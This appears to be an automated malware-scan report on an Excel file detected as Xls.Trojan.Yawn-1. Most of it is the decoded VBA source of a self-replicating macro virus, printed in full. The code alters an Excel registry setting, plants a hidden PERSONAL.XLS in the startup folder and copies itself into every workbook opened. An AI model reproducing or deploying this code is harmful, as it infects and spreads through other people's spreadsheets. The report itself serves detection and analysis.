MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is an Excel document containing VBA macros, specifically an Auto_Open macro, which is a common technique for malicious documents. The VBA code attempts to write to the registry key 'HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel' with the value 'Options6', likely to establish persistence. The ClamAV detection further confirms its malicious nature.
Heuristics 3
-
ClamAV: Xls.Trojan.Yawn-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Yawn-1
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Private Sub auto_open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5074 bytes |
SHA-256: d95fd492012329d2bf588e60725df4c56c744636d189cd332ba9a4c87e6752cf |
|||
|
Detection
ClamAV:
Xls.Trojan.Yawn-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim p As String
Dim AppS As String
'taitai
Private Sub auto_open()
u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
u = RegCloseKey(k)
p = Application.PathSeparator
AppS = Application.StartupPath
DelMcr
If UCase(ThisWorkbook.Name) = "PERSONAL.XLS" Then
Application.OnSheetActivate = "ActOpf_Evt"
ActOpf_Evt
Else
CkStrUP
End If
End Sub
Private Sub ActOpf_Evt()
On Error GoTo h_er
Application.DisplayAlerts = False
Application.ScreenUpdating = False
awn = ActiveWorkbook.Name
If Left(Right(awn, 4), 3) = ".xl" Then
aw_m_n = Chk_Mo_N(awn)
If aw_m_n = "" Then
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
Else
m_n = ActiveWorkbook.VBProject.vbcomponents(aw_m_n).codemodule.Lines(9, 1)
If m_n <> "'taitai" Then
Set v_c = ActiveWorkbook.VBProject.vbcomponents
For i = v_c.Count To 1 Step -1
If v_c(i).Type = 1 Or v_c(i).Type = 2 Then
v_c.Remove v_c(i)
End If
Next i
n = Chk_Mo_N(ThisWorkbook.Name)
cop_m (n)
Workbooks(awn).Save
End If
End If
End If
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Exit Sub
h_er:
End Sub
Private Sub CkStrUP()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
f1 = "PERSONAL.XLS"
If UCase(Dir(AppS & p & f1)) <> f1 Then
cre_f
ElseIf chk_per = False Then
Workbooks("Personal.xls").Close
Kill AppS & p & f1
cre_f
Else
End If
Workbooks("Personal.xls").Close
Workbooks.Open AppS & p & "Personal.xls"
Application.OnSheetActivate = "'" & AppS & p & f1 & "'!ActOpf_Evt"
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
Private Function chk_per()
ar2 = ExecuteExcel4Macro(arg)
ModuleName1 = Chk_Mo_N("Personal.xls")
If ar2 <> ModuleName1 Then
chk_per = False
Else
chk_per = True
End If
End Function
Private Function Chk_Mo_N(WkName)
On Error Resume Next
Set a1 = Workbooks(WkName).VBProject.vbcomponents
For i = 1 To a1.Count
If a1(i).Type = 1 Then
Chk_Mo_N = a1(i).Name
Exit For
Else
Chk_Mo_N = ""
End If
Next i
End Function
Private Sub cre_f()
Workbooks.Add
n = Chk_Mo_N(ThisWorkbook.Name)
Range("C1") = "=rand()"
r_n = Chr((Range("C1") * 100) Mod 21 + 65) & _
Chr((Val(Left(Right(Now(), 5), 2)) * 100) Mod 21 + 65)
Range("C1") = r_n
cop_m (n)
ActiveWorkbook.VBProject.vbcomponents(n).Name = r_n
Set aw = ActiveWorkbook.Sheets
For i = aw.Count To 2 Step -1
aw(i).Delete
Next i
aw_n = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks(aw_n).SaveAs AppS & p & "Personal.xls"
End Sub
Private Function cop_m(n)
On Error Resume Next
Set tw = ThisWorkbook.VBProject.vbcomponents
Set aw = ActiveWorkbook.VBProject.vbcomponents
tw(n).Export (AppS & p & "t")
aw.Import (AppS & p & "t")
Kill (AppS & p & "t")
tw("Class1").Export (AppS & p & "t")
aw.Import (AppS & p & "t")
Kill (AppS & p & "t")
End Function
Private Sub DelMcr()
On Error Resume Next
n1 = ActiveWorkbook.Name
Set a2 = Application.CommandBars("Tools")
a2.Reset
If a2.Controls(10).Id = 30017 Then
a2.Controls(10).Delete
End If
Workbooks(n1).Activate
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: 8587d6137d74e570be83ac7ebc392189678c586fea832e42656c6dd96028a8bf |
|||
|
Detection
ClamAV:
Xls.Trojan.Yawn-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.